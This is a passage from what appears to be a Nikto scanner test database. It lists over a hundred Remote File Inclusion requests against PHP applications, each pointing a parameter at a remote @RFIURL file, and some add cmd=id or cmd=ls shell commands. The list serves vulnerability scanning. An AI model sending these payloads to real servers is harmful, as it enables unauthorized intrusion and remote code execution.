list.\",\"\",\"\"\n\"005018\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/kb_constants.php?module_root_path=@RFIURL?cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005019\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/lang/language.php?path_to_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005020\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/lib-account.inc.php?CONF_CONFIG_PATH=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005021\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/lib-group.inc.php?CONF_CONFIG_PATH=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005022\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/lib-log.inc.php?CONF_CONFIG_PATH=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005023\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/lib-mydb.inc.php?CONF_CONFIG_PATH=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005024\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/lib-template-mod.inc.php?CONF_CONFIG_PATH=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005025\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/lib-themes.inc.php?CONF_CONFIG_PATH=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005026\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/logger_engine.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005027\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/menuleft.inc.php?PagePrefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005028\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/mkb.php?phpbb_root_path=@RFIURL?ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005029\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/morcegoCMS/adodb/adodb.inc.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005030\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/morcegoCMS/morcegoCMS.php?fichero=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005031\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/mx_common.php?module_root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005032\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005033\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005034\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/pafiledb_constants.php?module_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005035\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/pages.inc.php?PagePrefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005036\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/phpdig/includes/config.php?relative_script_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005037\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/profilcp_constants.php?module_root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005038\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/settings.inc.php?approot=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005039\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/template.php?myevent_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005040\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/themen_portal_mitte.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005041\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/tumbnail.php?config[root_ordner]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005042\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/usercp_register.php?phpbb_root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005043\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/usercp_viewprofile.php?phpbb_root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005044\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/includes/xhtml.php?d_root=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005045\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php3?Application_Root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005046\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?1=lol&PAGES[lol]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005047\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?AML_opensite=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005048\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?AMV_openconfig=1&AMV_serverpath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005049\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?CONFIG[MWCHAT_Libs]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005050\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?ConfigDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005051\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?DIR_PLUGINS=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005052\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?G_JGALL[inc_path]=@RFIURL%00\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005053\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?HomeDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005054\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?Lang=AR&Page=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005055\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?Madoa=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005056\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?RP_PATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005057\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005058\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005059\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?abg_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005060\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?abs_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005061\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?abs_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005062\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?adduser=true&lang=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005063\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?adodb=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005064\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?ads_file=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005065\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?arquivo=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005066\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?back=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005067\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?base==@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005068\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?basePath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005069\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?bibtexrootrel=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005070\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?blog_dc_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005071\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?blog_theme=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005072\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?body=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005073\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?class_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005074\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?classified_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005075\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?cms=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005076\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?config[\\\"sipssys\\\"]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005077\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?config[root_ordner]=@RFIURL?&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005078\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?config[root_ordner]=@RFIURL?cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005079\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?config_atkroot=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005080\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?configuration=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005081\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?custom_admin_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005082\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?dateiPfad=@RFIURL?&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005083\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?de=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005084\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?dept=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005085\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?do=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005086\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?exec=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005087\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?ext=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005088\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?faq_path=@RFIURL?&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005089\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?file_name[]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005090\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?file_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005091\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?fileloc=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005092\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?from=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005093\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?func=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005094\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?function=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005095\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?function=custom&custom=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005096\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?gOo=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005097\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?gen=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005098\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?get=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005099\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?home_name=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005100\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?ilang=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005101\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?inc_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005102\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?inc_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005103\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?includeDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005104\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?includeFooter=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005105\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?includesdir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005106\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?insPath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005107\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?lang=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005108\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?language=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005109\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?language=en&main_page=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005110\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?lizge=@RFIURL?&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005111\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?lng=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005112\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?load=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005113\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?loadpage=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005114\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?main_tabid=1&main_content=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005115\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?may=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005116\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?middle=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005117\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?mode=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005118\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?mode=@RFIURL?&cmd=\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005119\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?modpath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005120\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?module=PostWrap&page=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005121\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005122\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?news7[\\\"functions\\\"]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005123\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?news_include_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005124\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?open=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005125\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?option=com_custompages&cpage=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005126\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?page=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005127\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?page=@RFIURL%00\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005128\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?page=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005129\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?page@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005130\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?page[path]=@RFIURL?&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005131\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?pagename=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005132\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?pager=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005133\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?pagina=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005134\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?path_to_folder=@RFIURL?cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005135\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?pg=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005136\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?pg=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005137\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005138\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?plugin=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005139\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?principal=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005140\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?proMod=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005141\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/index.php?proMod=@RFIURL?cmd\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion 